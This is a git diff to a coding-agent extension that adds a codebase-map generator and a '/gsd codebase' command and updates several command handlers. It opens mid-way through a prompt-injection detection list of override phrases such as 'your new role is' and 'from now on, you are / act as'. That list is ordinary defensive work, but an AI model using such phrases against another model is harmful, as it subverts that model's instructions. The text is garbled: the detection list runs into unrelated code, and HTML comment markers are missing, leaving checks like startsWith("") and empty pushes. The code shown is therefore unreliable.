"Instruction override:::i:::your new role is" + "Instruction override:::i:::from now on,? (you (are|will|must|should)|act as)" + + # Hidden HTML directives + "Hidden directive:::::: comment blocks to preserve + * descriptions for files in collapsed directories across incremental updates. 
+ */ +export function parseCodebaseMap(content: string): Map { + const descriptions = new Map(); + let inCollapsedBlock = false; + + for (const line of content.split("\n")) { + // Track collapsed-description comment blocks + if (line.trimStart().startsWith("")) { + inCollapsedBlock = false; + continue; + } + + // Match: - `path/to/file.ts` — Description here + const match = line.match(/^- `(.+?)` — (.+)$/); + if (match) { + descriptions.set(match[1], match[2]); + continue; + } + + // Match: - `path/to/file.ts` (no description) — only outside collapsed blocks + if (!inCollapsedBlock) { + const bareMatch = line.match(/^- `(.+?)`\s*$/); + if (bareMatch) { + descriptions.set(bareMatch[1], ""); + } + } + } + return descriptions; +} + +export function parseCodebaseMapMetadata(content: string): CodebaseMapMetadata | null { + const metaLine = content + .split("\n") + .find((line) => line.trimStart().startsWith(CODEBASE_METADATA_PREFIX)); + if (!metaLine) return null; + + const trimmed = metaLine.trim(); + const jsonStart = CODEBASE_METADATA_PREFIX.length; + const jsonEnd = trimmed.lastIndexOf(" -->"); + if (jsonEnd <= jsonStart) return null; + + try { + const parsed = JSON.parse(trimmed.slice(jsonStart, jsonEnd)); + if ( + typeof parsed?.generatedAt === "string" + && typeof parsed?.fingerprint === "string" + && typeof parsed?.fileCount === "number" + && typeof parsed?.truncated === "boolean" + ) { + return parsed as CodebaseMapMetadata; + } + } catch { + // Ignore malformed metadata and treat the map as stale. 
+ } + return null; +} + +// ─── File Enumeration ──────────────────────────────────────────────────────── + +function shouldExclude(filePath: string, excludes: string[]): boolean { + for (const pattern of excludes) { + if (pattern.endsWith("/")) { + if (filePath.startsWith(pattern) || filePath.includes(`/${pattern}`)) return true; + } else if (filePath === pattern || filePath.endsWith(`/${pattern}`)) { + return true; + } + } + // Skip binary/lock files + const ext = extname(filePath).toLowerCase(); + if ([".lock", ".png", ".jpg", ".jpeg", ".gif", ".ico", ".woff", ".woff2", ".ttf", ".eot", ".svg"].includes(ext)) { + return true; + } + return false; +} + +function lsFiles(basePath: string): string[] { + try { + const result = execSync("git ls-files", { cwd: basePath, encoding: "utf-8", timeout: 10000 }); + return result.split("\n").filter(Boolean); + } catch { + return []; + } +} + +/** + * Enumerate tracked files, applying exclusions and the maxFiles cap. + * Returns both the file list and whether truncation occurred. + */ +function enumerateFiles(basePath: string, excludes: string[], maxFiles: number): { files: string[]; truncated: boolean } { + const allFiles = lsFiles(basePath); + const filtered = allFiles.filter((f) => !shouldExclude(f, excludes)); + const truncated = filtered.length > maxFiles; + return { files: truncated ? filtered.slice(0, maxFiles) : filtered, truncated }; +} + +function resolveGeneratorOptions(options?: CodebaseMapOptions): ResolvedCodebaseMapOptions { + const excludes = [...DEFAULT_EXCLUDES, ...(options?.excludePatterns ?? [])]; + const maxFiles = options?.maxFiles ?? DEFAULT_MAX_FILES; + const collapseThreshold = options?.collapseThreshold ?? 
DEFAULT_COLLAPSE_THRESHOLD; + return { + excludes, + maxFiles, + collapseThreshold, + optionSignature: JSON.stringify({ + excludes, + maxFiles, + collapseThreshold, + }), + }; +} + +function computeCodebaseFingerprint( + files: string[], + resolved: ResolvedCodebaseMapOptions, + truncated: boolean, +): string { + return createHash("sha1") + .update(JSON.stringify({ + files, + truncated, + optionSignature: resolved.optionSignature, + })) + .digest("hex"); +} + +// ─── Grouping ──────────────────────────────────────────────────────────────── + +function groupByDirectory( + files: string[], + descriptions: Map, + collapseThreshold: number, +): DirectoryGroup[] { + const dirMap = new Map(); + + for (const file of files) { + const dir = dirname(file); + const dirKey = dir === "." ? "" : dir; + if (!dirMap.has(dirKey)) { + dirMap.set(dirKey, []); + } + dirMap.get(dirKey)!.push({ + path: file, + description: descriptions.get(file) ?? "", + }); + } + + const groups: DirectoryGroup[] = []; + const sortedDirs = [...dirMap.keys()].sort(); + + for (const dir of sortedDirs) { + const dirFiles = dirMap.get(dir)!; + dirFiles.sort((a, b) => a.path.localeCompare(b.path)); + + groups.push({ + path: dir, + files: dirFiles, + collapsed: dirFiles.length > collapseThreshold, + }); + } + + return groups; +} + +// ─── Rendering ─────────────────────────────────────────────────────────────── + +function renderCodebaseMap( + groups: DirectoryGroup[], + totalFiles: number, + truncated: boolean, + metadata: CodebaseMapMetadata, +): string { + const lines: string[] = []; + const described = groups.reduce((sum, g) => sum + g.files.filter((f) => f.description).length, 0); + + lines.push("# Codebase Map"); + lines.push(""); + lines.push(`Generated: ${metadata.generatedAt} | Files: ${totalFiles} | Described: ${described}/${totalFiles}`); + lines.push(`${CODEBASE_METADATA_PREFIX}${JSON.stringify(metadata)} -->`); + if (truncated) { + lines.push(`Note: Truncated to first ${totalFiles} files. 
Run with higher --max-files to include all.`); + } + lines.push(""); + + for (const group of groups) { + const heading = group.path || "(root)"; + lines.push(`### ${heading}/`); + + if (group.collapsed) { + // Summarize collapsed directories + const extensions = new Map(); + for (const f of group.files) { + const ext = extname(f.path) || "(no ext)"; + extensions.set(ext, (extensions.get(ext) ?? 0) + 1); + } + const extSummary = [...extensions.entries()] + .sort((a, b) => b[1] - a[1]) + .map(([ext, count]) => `${count} ${ext}`) + .join(", "); + lines.push(`- *(${group.files.length} files: ${extSummary})*`); + + // Preserve any existing descriptions in a hidden comment block so + // incremental updates can recover them via parseCodebaseMap. + const descLines = group.files + .filter((f) => f.description) + .map((f) => `- \`${f.path}\` — ${f.description}`); + if (descLines.length > 0) { + lines.push(""); + } + } else { + for (const file of group.files) { + if (file.description) { + lines.push(`- \`${file.path}\` — ${file.description}`); + } else { + lines.push(`- \`${file.path}\``); + } + } + } + lines.push(""); + } + + return lines.join("\n"); +} + +function buildCodebaseMap( + basePath: string, + resolved: ResolvedCodebaseMapOptions, + existingDescriptions?: Map, + enumerated?: EnumeratedFiles, +): { + content: string; + fileCount: number; + truncated: boolean; + files: string[]; + fingerprint: string; + generatedAt: string; +} { + const listed = enumerated ?? enumerateFiles(basePath, resolved.excludes, resolved.maxFiles); + const descriptions = existingDescriptions ?? 
new Map(); + const groups = groupByDirectory(listed.files, descriptions, resolved.collapseThreshold); + const generatedAt = new Date().toISOString().split(".")[0] + "Z"; + const metadata: CodebaseMapMetadata = { + generatedAt, + fingerprint: computeCodebaseFingerprint(listed.files, resolved, listed.truncated), + fileCount: listed.files.length, + truncated: listed.truncated, + }; + const content = renderCodebaseMap(groups, listed.files.length, listed.truncated, metadata); + + return { + content, + fileCount: listed.files.length, + truncated: listed.truncated, + files: listed.files, + fingerprint: metadata.fingerprint, + generatedAt, + }; +} + +// ─── Public API ────────────────────────────────────────────────────────────── + +/** + * Generate a fresh CODEBASE.md from scratch. + * Preserves existing descriptions if `existingDescriptions` is provided. + */ +export function generateCodebaseMap( + basePath: string, + options?: CodebaseMapOptions, + existingDescriptions?: Map, +): { content: string; fileCount: number; truncated: boolean; files: string[]; fingerprint: string; generatedAt: string } { + const resolved = resolveGeneratorOptions(options); + return buildCodebaseMap(basePath, resolved, existingDescriptions); +} + +/** + * Incremental update: re-scan files, preserve existing descriptions, + * add new files, remove deleted files. 
+ */ +export function updateCodebaseMap( + basePath: string, + options?: CodebaseMapOptions, +): { + content: string; + added: number; + removed: number; + unchanged: number; + fileCount: number; + truncated: boolean; + fingerprint: string; + generatedAt: string; +} { + const codebasePath = join(gsdRoot(basePath), "CODEBASE.md"); + const resolved = resolveGeneratorOptions(options); + + // Load existing descriptions + let existingDescriptions = new Map(); + if (existsSync(codebasePath)) { + const existing = readFileSync(codebasePath, "utf-8"); + existingDescriptions = parseCodebaseMap(existing); + } + + const existingFiles = new Set(existingDescriptions.keys()); + + // Generate new map preserving descriptions — reuse the returned file list + // to avoid a second enumeration (prevents race between content and stats). + const result = buildCodebaseMap(basePath, resolved, existingDescriptions); + const currentSet = new Set(result.files); + + // Count changes + let added = 0; + let removed = 0; + + for (const f of result.files) { + if (!existingFiles.has(f)) added++; + } + for (const f of existingFiles) { + if (!currentSet.has(f)) removed++; + } + + return { + content: result.content, + added, + removed, + unchanged: result.files.length - added, + fileCount: result.fileCount, + truncated: result.truncated, + fingerprint: result.fingerprint, + generatedAt: result.generatedAt, + }; +} + +function clearFreshnessCache(basePath: string): void { + for (const key of freshnessCache.keys()) { + if (key === basePath || key.startsWith(`${basePath}::`)) { + freshnessCache.delete(key); + } + } +} + +export function ensureCodebaseMapFresh( + basePath: string, + options?: CodebaseMapOptions, + ensureOptions?: EnsureCodebaseMapOptions, +): EnsureCodebaseMapResult { + const resolved = resolveGeneratorOptions(options); + const cacheKey = `${basePath}::${resolved.optionSignature}`; + const ttlMs = ensureOptions?.ttlMs ?? 
DEFAULT_REFRESH_TTL_MS; + const maxAgeMs = ensureOptions?.maxAgeMs ?? DEFAULT_MAX_AGE_MS; + const force = ensureOptions?.force === true; + const now = Date.now(); + + if (!force && ttlMs > 0) { + const cached = freshnessCache.get(cacheKey); + if (cached && now - cached.checkedAt < ttlMs) { + return cached.result; + } + } + + const existing = readCodebaseMap(basePath); + const listed = enumerateFiles(basePath, resolved.excludes, resolved.maxFiles); + const fingerprint = computeCodebaseFingerprint(listed.files, resolved, listed.truncated); + + const cacheAndReturn = (result: EnsureCodebaseMapResult): EnsureCodebaseMapResult => { + freshnessCache.set(cacheKey, { checkedAt: now, result }); + return result; + }; + + if (!existing) { + const generated = buildCodebaseMap(basePath, resolved, undefined, listed); + if (generated.fileCount > 0) { + writeCodebaseMap(basePath, generated.content); + return cacheAndReturn({ + status: "generated", + fileCount: generated.fileCount, + truncated: generated.truncated, + generatedAt: generated.generatedAt, + fingerprint: generated.fingerprint, + reason: "missing", + }); + } + return cacheAndReturn({ + status: "empty", + fileCount: 0, + truncated: false, + generatedAt: null, + fingerprint, + reason: "no-tracked-files", + }); + } + + const metadata = parseCodebaseMapMetadata(existing); + const existingDescriptions = parseCodebaseMap(existing); + const ageMs = metadata ? now - Date.parse(metadata.generatedAt) : Number.POSITIVE_INFINITY; + const staleReason = + !metadata ? "missing-metadata" + : metadata.fingerprint !== fingerprint ? "files-changed" + : metadata.fileCount !== listed.files.length ? "file-count-changed" + : metadata.truncated !== listed.truncated ? "truncation-changed" + : maxAgeMs > 0 && Number.isFinite(ageMs) && ageMs > maxAgeMs ? "expired" + : undefined; + + if (!staleReason) { + return cacheAndReturn({ + status: "fresh", + fileCount: metadata?.fileCount ?? listed.files.length, + truncated: metadata?.truncated ?? 
listed.truncated, + generatedAt: metadata?.generatedAt ?? null, + fingerprint: metadata?.fingerprint ?? fingerprint, + }); + } + + const updated = buildCodebaseMap(basePath, resolved, existingDescriptions, listed); + if (updated.fileCount > 0) { + writeCodebaseMap(basePath, updated.content); + return cacheAndReturn({ + status: "updated", + fileCount: updated.fileCount, + truncated: updated.truncated, + generatedAt: updated.generatedAt, + fingerprint: updated.fingerprint, + reason: staleReason, + }); + } + + return cacheAndReturn({ + status: "empty", + fileCount: 0, + truncated: false, + generatedAt: null, + fingerprint, + reason: staleReason, + }); +} + +/** + * Write CODEBASE.md to .gsd/ directory. + */ +export function writeCodebaseMap(basePath: string, content: string): string { + const root = gsdRoot(basePath); + mkdirSync(root, { recursive: true }); + const outPath = join(root, "CODEBASE.md"); + writeFileSync(outPath, content, "utf-8"); + clearFreshnessCache(basePath); + return outPath; +} + +/** + * Read existing CODEBASE.md, or return null if it doesn't exist. + */ +export function readCodebaseMap(basePath: string): string | null { + const codebasePath = join(gsdRoot(basePath), "CODEBASE.md"); + if (!existsSync(codebasePath)) return null; + try { + return readFileSync(codebasePath, "utf-8"); + } catch { + return null; + } +} + +/** + * Get stats about the codebase map. + */ +export function getCodebaseMapStats(basePath: string): { + exists: boolean; + fileCount: number; + describedCount: number; + undescribedCount: number; + generatedAt: string | null; +} { + const content = readCodebaseMap(basePath); + if (!content) { + return { exists: false, fileCount: 0, describedCount: 0, undescribedCount: 0, generatedAt: null }; + } + + // Parse total file count from the header line (accurate even for collapsed dirs) + const fileCountMatch = content.match(/Files:\s*(\d+)/); + const totalFiles = fileCountMatch ? 
parseInt(fileCountMatch[1], 10) : 0; + + // Use parseCodebaseMap to count described files (includes collapsed-description blocks) + const descriptions = parseCodebaseMap(content); + const described = [...descriptions.values()].filter((d) => d.length > 0).length; + const dateMatch = content.match(/Generated: (\S+)/); + + return { + exists: true, + fileCount: totalFiles, + describedCount: described, + undescribedCount: totalFiles - described, + generatedAt: dateMatch?.[1] ?? null, + }; +} diff --git a/src/resources/extensions/gsd/commands-bootstrap.ts b/src/resources/extensions/gsd/commands-bootstrap.ts index 9a973c2d9..0f5c55cd1 100644 --- a/src/resources/extensions/gsd/commands-bootstrap.ts +++ b/src/resources/extensions/gsd/commands-bootstrap.ts @@ -45,6 +45,7 @@ const TOP_LEVEL_SUBCOMMANDS = [ { cmd: "start", desc: "Start a workflow template" }, { cmd: "templates", desc: "List available workflow templates" }, { cmd: "extensions", desc: "Manage extensions" }, + { cmd: "codebase", desc: "Generate, refresh, and inspect the codebase map cache" }, ] as const; function filterStartsWith( @@ -218,6 +219,15 @@ function getGsdArgumentCompletions(prefix: string) { ], "extensions"); } + if (parts[0] === "codebase" && parts.length <= 2) { + return filterStartsWith(partial, [ + { cmd: "generate", desc: "Generate or regenerate CODEBASE.md" }, + { cmd: "update", desc: "Refresh the CODEBASE.md cache immediately" }, + { cmd: "stats", desc: "Show codebase-map coverage and generation time" }, + { cmd: "help", desc: "Show usage and subcommands" }, + ], "codebase"); + } + if (parts[0] === "doctor" && parts.length <= 2) { return filterStartsWith(partial, [ { cmd: "fix", desc: "Auto-fix detected issues" }, diff --git a/src/resources/extensions/gsd/commands-codebase.ts b/src/resources/extensions/gsd/commands-codebase.ts new file mode 100644 index 000000000..20967e03f --- /dev/null +++ b/src/resources/extensions/gsd/commands-codebase.ts @@ -0,0 +1,197 @@ +/** + * GSD Command — /gsd 
codebase + * + * Generate and manage the codebase map (.gsd/CODEBASE.md). + * Subcommands: generate, update, stats, help + */ + +import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent"; + +import { + generateCodebaseMap, + updateCodebaseMap, + writeCodebaseMap, + getCodebaseMapStats, + readCodebaseMap, +} from "./codebase-generator.js"; +import { loadEffectiveGSDPreferences } from "./preferences.js"; +import type { CodebaseMapOptions } from "./codebase-generator.js"; + +const USAGE = + "Usage: /gsd codebase [generate|update|stats]\n\n" + + " generate [--max-files N] [--collapse-threshold N] — Generate or regenerate CODEBASE.md\n" + + " update [--max-files N] [--collapse-threshold N] — Refresh the CODEBASE.md cache immediately\n" + + " stats — Show file count, coverage, and generation time\n" + + " help — Show this help\n\n" + + "With no subcommand, shows stats if a map exists or help if not.\n" + + "GSD also refreshes CODEBASE.md automatically before prompt injection and after completed units when tracked files change.\n\n" + + "Configure defaults via preferences.md:\n" + + " codebase:\n" + + " exclude_patterns: [\"docs/\", \"fixtures/\"]\n" + + " max_files: 1000\n" + + " collapse_threshold: 15"; + +export async function handleCodebase( + args: string, + ctx: ExtensionCommandContext, + _pi: ExtensionAPI, +): Promise { + const basePath = process.cwd(); + const parts = args.trim().split(/\s+/); + const sub = parts[0] ?? ""; + + switch (sub) { + case "generate": { + const options = resolveCodebaseOptions(args, ctx); + if (options === false) return; // validation failed, message already shown + + const existing = readCodebaseMap(basePath); + const existingDescriptions = existing + ? 
(await import("./codebase-generator.js")).parseCodebaseMap(existing) + : undefined; + + const result = generateCodebaseMap(basePath, options, existingDescriptions); + + if (result.fileCount === 0) { + ctx.ui.notify( + "Codebase map generated with 0 files.\n" + + "Is this a git repository? Run 'git ls-files' to verify.", + "warning", + ); + return; + } + + const outPath = writeCodebaseMap(basePath, result.content); + ctx.ui.notify( + `Codebase map generated: ${result.fileCount} files\n` + + `Written to: ${outPath}` + + (result.truncated ? `\n⚠ Truncated — increase --max-files to include all files` : ""), + "success", + ); + return; + } + + case "update": { + const existing = readCodebaseMap(basePath); + if (!existing) { + ctx.ui.notify( + "No codebase map found. Run /gsd codebase generate to create one.", + "warning", + ); + return; + } + + const options = resolveCodebaseOptions(args, ctx); + if (options === false) return; + + const result = updateCodebaseMap(basePath, options); + writeCodebaseMap(basePath, result.content); + + ctx.ui.notify( + `Codebase map updated: ${result.fileCount} files\n` + + ` Added: ${result.added} | Removed: ${result.removed} | Unchanged: ${result.unchanged}` + + (result.truncated ? `\n⚠ Truncated — increase --max-files to include all files` : ""), + "success", + ); + return; + } + + case "stats": { + showStats(basePath, ctx); + return; + } + + case "help": + ctx.ui.notify(USAGE, "info"); + return; + + case "": { + // Safe default: show stats if map exists, help if not + const existing = readCodebaseMap(basePath); + if (existing) { + showStats(basePath, ctx); + } else { + ctx.ui.notify(USAGE, "info"); + } + return; + } + + default: + ctx.ui.notify( + `Unknown subcommand "${sub}".\n\n${USAGE}`, + "warning", + ); + } +} + +function showStats(basePath: string, ctx: ExtensionCommandContext): void { + const stats = getCodebaseMapStats(basePath); + if (!stats.exists) { + ctx.ui.notify("No codebase map found. 
Run /gsd codebase generate to create one.", "info"); + return; + } + + const coverage = stats.fileCount > 0 + ? Math.round((stats.describedCount / stats.fileCount) * 100) + : 0; + + ctx.ui.notify( + `Codebase Map Stats:\n` + + ` Files: ${stats.fileCount}\n` + + ` Described: ${stats.describedCount} (${coverage}%)\n` + + ` Undescribed: ${stats.undescribedCount}\n` + + ` Generated: ${stats.generatedAt ?? "unknown"}\n\n` + + (stats.undescribedCount > 0 + ? `Tip: Auto-refresh keeps the cache current, but /gsd codebase update forces an immediate refresh.` + : `Coverage is complete.`), + "info", + ); +} + +/** + * Resolve codebase map options by merging preferences with CLI flags. + * CLI flags override preferences; preferences override built-in defaults. + * Returns false if validation failed (error already shown to user). + */ +function resolveCodebaseOptions(args: string, ctx: ExtensionCommandContext): CodebaseMapOptions | false { + // Load preferences defaults + const prefs = loadEffectiveGSDPreferences()?.preferences?.codebase; + + // Parse CLI flags + const maxFilesStr = extractFlag(args, "--max-files"); + const collapseStr = extractFlag(args, "--collapse-threshold"); + + // Validate --max-files + let maxFiles: number | undefined; + if (maxFilesStr) { + maxFiles = parseInt(maxFilesStr, 10); + if (isNaN(maxFiles) || maxFiles < 1) { + ctx.ui.notify("--max-files must be a positive integer (e.g. --max-files 200).", "warning"); + return false; + } + } + + // Validate --collapse-threshold + let collapseThreshold: number | undefined; + if (collapseStr) { + collapseThreshold = parseInt(collapseStr, 10); + if (isNaN(collapseThreshold) || collapseThreshold < 1) { + ctx.ui.notify("--collapse-threshold must be a positive integer (e.g. --collapse-threshold 15).", "warning"); + return false; + } + } + + return { + // CLI flags override preferences + maxFiles: maxFiles ?? prefs?.max_files, + collapseThreshold: collapseThreshold ?? 
prefs?.collapse_threshold, + excludePatterns: prefs?.exclude_patterns, + }; +} + +function extractFlag(args: string, flag: string): string | undefined { + const escaped = flag.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"); + const regex = new RegExp(`${escaped}[=\\s]+(\\S+)`); + const match = args.match(regex); + return match?.[1]; +} diff --git a/src/resources/extensions/gsd/commands-config.ts b/src/resources/extensions/gsd/commands-config.ts index ec5a8b596..01cf58c14 100644 --- a/src/resources/extensions/gsd/commands-config.ts +++ b/src/resources/extensions/gsd/commands-config.ts @@ -22,6 +22,12 @@ export const TOOL_KEYS = [ { id: "groq", env: "GROQ_API_KEY", label: "Groq Voice", hint: "console.groq.com" }, ] as const; +function getStoredToolKey(auth: AuthStorage, providerId: string): string | undefined { + const creds = auth.getCredentialsForProvider(providerId); + const cred = creds.find((c) => c.type === "api_key" && c.key); + return cred?.type === "api_key" ? cred.key : undefined; +} + /** * Load tool API keys from auth.json into environment variables. * Called at session startup to ensure tools have access to their credentials. @@ -33,9 +39,9 @@ export function loadToolApiKeys(): void { const auth = AuthStorage.create(authPath); for (const tool of TOOL_KEYS) { - const cred = auth.get(tool.id); - if (cred && cred.type === "api_key" && cred.key && !process.env[tool.env]) { - process.env[tool.env] = cred.key; + const key = getStoredToolKey(auth, tool.id); + if (key && !process.env[tool.env]) { + process.env[tool.env] = key; } } } catch { @@ -55,14 +61,14 @@ export async function handleConfig(ctx: ExtensionCommandContext): Promise // Show current status const statusLines = ["GSD Tool Configuration\n"]; for (const tool of TOOL_KEYS) { - const hasKey = !!process.env[tool.env] || !!(auth.get(tool.id) as { key?: string })?.key; + const hasKey = !!process.env[tool.env] || !!getStoredToolKey(auth, tool.id); statusLines.push(` ${hasKey ? 
"\u2713" : "\u2717"} ${tool.label}${hasKey ? "" : ` \u2014 get key at ${tool.hint}`}`); } ctx.ui.notify(statusLines.join("\n"), "info"); // Ask which tools to configure const options = TOOL_KEYS.map(t => { - const hasKey = !!process.env[t.env] || !!(auth.get(t.id) as { key?: string })?.key; + const hasKey = !!process.env[t.env] || !!getStoredToolKey(auth, t.id); return `${t.label} ${hasKey ? "(configured \u2713)" : "(not set)"}`; }); options.push("(done)"); diff --git a/src/resources/extensions/gsd/commands-extensions.ts b/src/resources/extensions/gsd/commands-extensions.ts index e63f90405..05b867e4f 100644 --- a/src/resources/extensions/gsd/commands-extensions.ts +++ b/src/resources/extensions/gsd/commands-extensions.ts @@ -105,7 +105,7 @@ function discoverManifests(): Map { const manifests = new Map(); if (!existsSync(extDir)) return manifests; for (const entry of readdirSync(extDir, { withFileTypes: true })) { - if (!entry.isDirectory()) continue; + if (!entry.isDirectory() && !entry.isSymbolicLink()) continue; const m = readManifest(join(extDir, entry.name)); if (m) manifests.set(m.id, m); } diff --git a/src/resources/extensions/gsd/commands-handlers.ts b/src/resources/extensions/gsd/commands-handlers.ts index e43ecb0fa..16af7230b 100644 --- a/src/resources/extensions/gsd/commands-handlers.ts +++ b/src/resources/extensions/gsd/commands-handlers.ts @@ -20,7 +20,8 @@ import { selectDoctorScope, filterDoctorIssues, } from "./doctor.js"; -import { isAutoActive } from "./auto.js"; +import { isAutoActive, checkRemoteAutoSession } from "./auto.js"; +import { getAutoWorktreePath } from "./auto-worktree.js"; import { projectRoot } from "./commands/context.js"; import { loadPrompt } from "./prompt-loader.js"; @@ -42,21 +43,27 @@ export function dispatchDoctorHeal(pi: ExtensionAPI, scope: string | undefined, ); } -export async function handleDoctor(args: string, ctx: ExtensionCommandContext, pi: ExtensionAPI): Promise { +/** Parse doctor command args into structured flags 
and positionals (pure, no I/O). */ +export function parseDoctorArgs(args: string) { const trimmed = args.trim(); - // Extract flags before positional parsing const jsonMode = trimmed.includes("--json"); const dryRun = trimmed.includes("--dry-run"); + const fixFlag = trimmed.includes("--fix"); const includeBuild = trimmed.includes("--build"); const includeTests = trimmed.includes("--test"); - const stripped = trimmed.replace(/--json|--dry-run|--build|--test/g, "").trim(); + const stripped = trimmed.replace(/--json|--dry-run|--build|--test|--fix/g, "").trim(); const parts = stripped ? stripped.split(/\s+/) : []; const mode = parts[0] === "fix" || parts[0] === "heal" || parts[0] === "audit" ? parts[0] : "doctor"; const requestedScope = mode === "doctor" ? parts[0] : parts[1]; + return { jsonMode, dryRun, fixFlag, includeBuild, includeTests, mode, requestedScope }; +} + +export async function handleDoctor(args: string, ctx: ExtensionCommandContext, pi: ExtensionAPI): Promise { + const { jsonMode, dryRun, fixFlag, includeBuild, includeTests, mode, requestedScope } = parseDoctorArgs(args); const scope = await selectDoctorScope(projectRoot(), requestedScope); const effectiveScope = mode === "audit" ? 
requestedScope : scope; const report = await runGSDDoctor(projectRoot(), { - fix: mode === "fix" || mode === "heal" || dryRun, + fix: mode === "fix" || mode === "heal" || dryRun || fixFlag, dryRun, scope: effectiveScope, includeBuild, @@ -82,7 +89,7 @@ export async function handleDoctor(args: string, ctx: ExtensionCommandContext, p scope: effectiveScope, includeWarnings: true, }); - const actionable = unresolved.filter(issue => issue.severity === "error" || issue.code === "all_tasks_done_missing_slice_uat" || issue.code === "slice_checked_missing_uat"); + const actionable = unresolved.filter(issue => issue.severity === "error"); if (actionable.length === 0) { ctx.ui.notify("Doctor heal found nothing actionable to hand off to the LLM.", "info"); return; @@ -222,7 +229,19 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext, const sid = state.activeSlice?.id ?? "none"; const tid = state.activeTask?.id ?? "none"; const appliedAt = `${mid}/${sid}/${tid}`; - await appendOverride(basePath, change, appliedAt); + + // Resolve the correct target path: only route to a worktree when auto-mode + // is actively running there (in-process or remote). A worktree directory may + // exist from a previous session without being the active runtime path — + // writing there without a live session would silently drop the override. + const autoRunning = isAutoActive() || checkRemoteAutoSession(basePath).running; + const wtPath = autoRunning && mid !== "none" + ? getAutoWorktreePath(basePath, mid) + : null; + const targetPath = wtPath ?? basePath; + await appendOverride(targetPath, change, appliedAt); + + const overrideLoc = wtPath ? 
"worktree `.gsd/OVERRIDES.md`" : "`.gsd/OVERRIDES.md`"; if (isAutoActive()) { pi.sendMessage({ @@ -232,14 +251,14 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext, "", `**Override:** ${change}`, "", - "This override has been saved to `.gsd/OVERRIDES.md` and will be injected into all future task prompts.", + `This override has been saved to ${overrideLoc} and will be injected into all future task prompts.`, "A document rewrite unit will run before the next task to propagate this change across all active plan documents.", "", "If you are mid-task, finish your current work respecting this override. The next dispatched unit will be a document rewrite.", ].join("\n"), display: false, }, { triggerTurn: true }); - ctx.ui.notify(`Override registered: "${change}". Will be applied before next task dispatch.`, "info"); + ctx.ui.notify(`Override registered (${overrideLoc}): "${change}". Will be applied before next task dispatch.`, "info"); } else { pi.sendMessage({ customType: "gsd-hard-steer", @@ -248,13 +267,13 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext, "", `**Override:** ${change}`, "", - "This override has been saved to `.gsd/OVERRIDES.md`.", - "Before continuing, read `.gsd/OVERRIDES.md` and update the current plan documents to reflect this change.", + `This override has been saved to ${overrideLoc}.`, + `Before continuing, read ${overrideLoc} and update the current plan documents to reflect this change.`, "Focus on: active slice plan, incomplete task plans, and DECISIONS.md.", ].join("\n"), display: false, }, { triggerTurn: true }); - ctx.ui.notify(`Override registered: "${change}". Update plan documents to reflect this change.`, "info"); + ctx.ui.notify(`Override registered (${overrideLoc}): "${change}". 
Update plan documents to reflect this change.`, "info"); } } diff --git a/src/resources/extensions/gsd/commands-inspect.ts b/src/resources/extensions/gsd/commands-inspect.ts index 87eb494b1..5421c00bf 100644 --- a/src/resources/extensions/gsd/commands-inspect.ts +++ b/src/resources/extensions/gsd/commands-inspect.ts @@ -8,6 +8,7 @@ import type { ExtensionCommandContext } from "@gsd/pi-coding-agent"; import { existsSync } from "node:fs"; import { join } from "node:path"; import { gsdRoot } from "./paths.js"; +import { logWarning } from "./workflow-logger.js"; import { getErrorMessage } from "./error-utils.js"; export interface InspectData { @@ -92,7 +93,7 @@ export async function handleInspect(ctx: ExtensionCommandContext): Promise ctx.ui.notify(formatInspectOutput(data), "info"); } catch (err) { - process.stderr.write(`gsd-db: /gsd inspect failed: ${getErrorMessage(err)}\n`); + logWarning("command", `/gsd inspect failed: ${getErrorMessage(err)}`); ctx.ui.notify("Failed to inspect GSD database. Check stderr for details.", "error"); } } diff --git a/src/resources/extensions/gsd/commands-maintenance.ts b/src/resources/extensions/gsd/commands-maintenance.ts index 5b6c4b8ff..09d9df9dc 100644 --- a/src/resources/extensions/gsd/commands-maintenance.ts +++ b/src/resources/extensions/gsd/commands-maintenance.ts @@ -1,18 +1,20 @@ /** - * GSD Maintenance — cleanup, skip, and dry-run handlers. + * GSD Maintenance — cleanup, skip, dry-run, and recover handlers. 
* - * Contains: handleCleanupBranches, handleCleanupSnapshots, handleCleanupWorktrees, handleSkip, handleDryRun + * Contains: handleCleanupBranches, handleCleanupSnapshots, handleCleanupWorktrees, handleSkip, handleDryRun, handleRecover */ import type { ExtensionCommandContext } from "@gsd/pi-coding-agent"; import { deriveState } from "./state.js"; import { nativeBranchList, nativeDetectMainBranch, nativeBranchListMerged, nativeBranchDelete, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js"; +import { logWarning } from "./workflow-logger.js"; export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePath: string): Promise { let branches: string[]; try { branches = nativeBranchList(basePath, "gsd/*"); - } catch { + } catch (e) { + logWarning("command", `branch list failed: ${(e as Error).message}`); ctx.ui.notify("No GSD branches to clean up.", "info"); return; } @@ -23,7 +25,8 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa let merged: string[]; try { merged = nativeBranchListMerged(basePath, mainBranch, "gsd/*"); - } catch { + } catch (e) { + logWarning("command", `merged branch list failed: ${(e as Error).message}`); merged = []; } @@ -33,8 +36,8 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa try { nativeBranchDelete(basePath, branch, false); deletedMerged++; - } catch { - /* skip branches that cannot be deleted */ + } catch (e) { + logWarning("command", `branch delete failed for ${branch}: ${(e as Error).message}`); } } @@ -44,8 +47,10 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa try { const { listWorktrees } = await import("./worktree-manager.js"); const { resolveMilestoneFile } = await import("./paths.js"); - const { loadFile, parseRoadmap } = await import("./files.js"); + const { loadFile } = await import("./files.js"); + const { parseRoadmap } = await import("./parsers-legacy.js"); const { isMilestoneComplete } = 
